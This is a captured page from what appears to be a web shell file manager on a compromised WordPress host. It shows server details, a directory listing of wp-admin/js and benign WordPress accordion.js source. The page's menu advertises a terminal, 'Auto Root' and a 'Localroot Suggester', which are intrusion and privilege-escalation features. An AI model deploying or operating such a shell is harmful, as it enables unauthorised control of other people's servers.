Linux box325.rapidenet.ca 5.14.0-687.25.1.el9_8.x86_64 #1 SMP PREEMPT_DYNAMIC Mon Jul 13 11:40:33 EDT 2026 x86_64
LiteSpeed
Server IP : 68.168.116.250 & Your IP : 216.73.216.215
Domains :
Cant Read [ /etc/named.conf ]
User : protectionrat
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
home /
protectionrat /
public_html /
wp-admin /
js /
Delete
Unzip
Name
Size
Permission
Date
Action
.htaccess
237
B
-r-xr-xr-x
2026-07-29 01:57
accordion.js
2.86
KB
-rw-r--r--
2025-12-27 11:45
accordion.min.js
758
B
-rw-r--r--
2025-12-27 11:45
auth-app.js
5.66
KB
-rw-r--r--
2021-02-23 19:45
color-picker.js
9.54
KB
-rw-r--r--
2021-03-18 19:01
color-picker.min.js
3.4
KB
-rw-r--r--
2022-04-08 20:07
comment.min.js
1.28
KB
-rw-r--r--
2022-04-08 20:07
common.js
61.15
KB
-rw-r--r--
2025-12-27 11:45
custom-background.js
3.35
KB
-rw-r--r--
2021-03-18 19:01
custom-header.js
1.98
KB
-rw-r--r--
2021-02-23 19:45
custom-header.php
499
B
-rw-r--r--
2025-12-27 11:45
customize-controls.js
288.41
KB
-rw-r--r--
2025-12-27 11:45
customize-controls.min.js
109.69
KB
-rw-r--r--
2025-12-27 11:45
customize-widgets.js
70.05
KB
-rw-r--r--
2025-12-27 11:45
edit-comments.js
37.12
KB
-rw-r--r--
2025-12-27 11:45
editor.js
44
KB
-rw-r--r--
2025-12-27 11:45
image-edit.js
39.98
KB
-rw-r--r--
2025-12-27 11:45
image-edit.min.js
15.15
KB
-rw-r--r--
2025-12-27 11:45
inline-edit-post.min-20260805044824-20260805044930-20260805045008.js
9.41
KB
-rw-r--r--
2025-12-27 11:45
iris.min.js
23.09
KB
-rw-r--r--
2021-11-03 19:40
media-gallery-20260805053140.js
1.27
KB
-rw-r--r--
2021-02-23 19:45
media-gallery.js
1.27
KB
-rw-r--r--
2021-02-23 19:45
media-gallery.min.js
611
B
-rw-r--r--
2022-04-08 20:07
media-upload.min.js
1.13
KB
-rw-r--r--
2025-12-27 11:45
media.min.js
2.38
KB
-rw-r--r--
2025-12-27 11:45
password-strength-meter.min.js
1.1
KB
-rw-r--r--
2021-01-22 12:32
plugin-install.js
6.92
KB
-rw-r--r--
2021-03-18 19:01
plugin-install.min.js
2.35
KB
-rw-r--r--
2025-12-27 11:45
post.min-20260805064159.js
18.4
KB
-rw-r--r--
2025-12-27 11:45
post.min.js
18.4
KB
-rw-r--r--
2025-12-27 11:45
revisions-20260805064151.js
33.92
KB
-rw-r--r--
2025-12-27 11:45
revisions.js
33.92
KB
-rw-r--r--
2025-12-27 11:45
set-post-thumbnail.min-20260805044808-20260805044848-20260805045018.js
620
B
-rw-r--r--
2020-07-07 18:55
set-post-thumbnail.min.js
620
B
-rw-r--r--
2020-07-07 18:55
site-health.js
13.15
KB
-rw-r--r--
2025-12-27 11:45
svg-painter.js
3.2
KB
-rw-r--r--
2025-12-27 11:45
svg-painter.min.js
1.53
KB
-rw-r--r--
2025-12-27 11:45
tags-box.js
10.88
KB
-rw-r--r--
2021-03-18 19:01
tags-box.min.js
3
KB
-rw-r--r--
2025-12-27 11:45
tags-suggest.js
5.64
KB
-rw-r--r--
2025-12-27 11:45
tags-suggest.min.js
2.22
KB
-rw-r--r--
2025-12-27 11:45
tags.js
5.96
KB
-rw-r--r--
2025-12-27 11:45
tags.min.js
2.41
KB
-rw-r--r--
2025-12-27 11:45
theme-plugin-editor.js
24.77
KB
-rw-r--r--
2025-12-27 11:45
theme-plugin-editor.min.js
11.43
KB
-rw-r--r--
2025-12-27 11:45
theme.min.js
26.51
KB
-rw-r--r--
2025-12-27 11:45
updates.js
109.37
KB
-rw-r--r--
2025-12-27 11:45
user-suggest.min.js
676
B
-rw-r--r--
2021-03-18 19:01
word-count.js
7.52
KB
-rw-r--r--
2020-07-27 23:35
Save
Rename
/** * Accordion-folding functionality. * * Markup with the appropriate classes will be automatically hidden, * with one section opening at a time when its title is clicked. * Use the following markup structure for accordion behavior: * * <div class="accordion-container"> * <div class="accordion-section open"> * <h3 class="accordion-section-title"><button type="button" aria-expanded="true" aria-controls="target-1"></button></h3> * <div class="accordion-section-content" id="target"> * </div> * </div> * <div class="accordion-section"> * <h3 class="accordion-section-title"><button type="button" aria-expanded="false" aria-controls="target-2"></button></h3> * <div class="accordion-section-content" id="target-2"> * </div> * </div> * <div class="accordion-section"> * <h3 class="accordion-section-title"><button type="button" aria-expanded="false" aria-controls="target-3"></button></h3> * <div class="accordion-section-content" id="target-3"> * </div> * </div> * </div> * * Note that any appropriate tags may be used, as long as the above classes are present. * * @since 3.6.0 * @output wp-admin/js/accordion.js */ ( function( $ ){ $( function () { // Expand/Collapse accordion sections on click. $( '.accordion-container' ).on( 'click', '.accordion-section-title button', function() { accordionSwitch( $( this ) ); }); }); /** * Close the current accordion section and open a new one. * * @param {Object} el Title element of the accordion section to toggle. * @since 3.6.0 */ function accordionSwitch ( el ) { var section = el.closest( '.accordion-section' ), container = section.closest( '.accordion-container' ), siblings = container.find( '.open' ), siblingsToggleControl = siblings.find( '[aria-expanded]' ).first(), content = section.find( '.accordion-section-content' ); // This section has no content and cannot be expanded. if ( section.hasClass( 'cannot-expand' ) ) { return; } // Add a class to the container to let us know something is happening inside. // This helps in cases such as hiding a scrollbar while animations are executing. container.addClass( 'opening' ); if ( section.hasClass( 'open' ) ) { section.toggleClass( 'open' ); content.toggle( true ).slideToggle( 150 ); } else { siblingsToggleControl.attr( 'aria-expanded', 'false' ); siblings.removeClass( 'open' ); siblings.find( '.accordion-section-content' ).show().slideUp( 150 ); content.toggle( false ).slideToggle( 150 ); section.toggleClass( 'open' ); } // We have to wait for the animations to finish. setTimeout(function(){ container.removeClass( 'opening' ); }, 150); // If there's an element with an aria-expanded attribute, assume it's a toggle control and toggle the aria-expanded value. if ( el ) { el.attr( 'aria-expanded', String( el.attr( 'aria-expanded' ) === 'false' ) ); } } })(jQuery);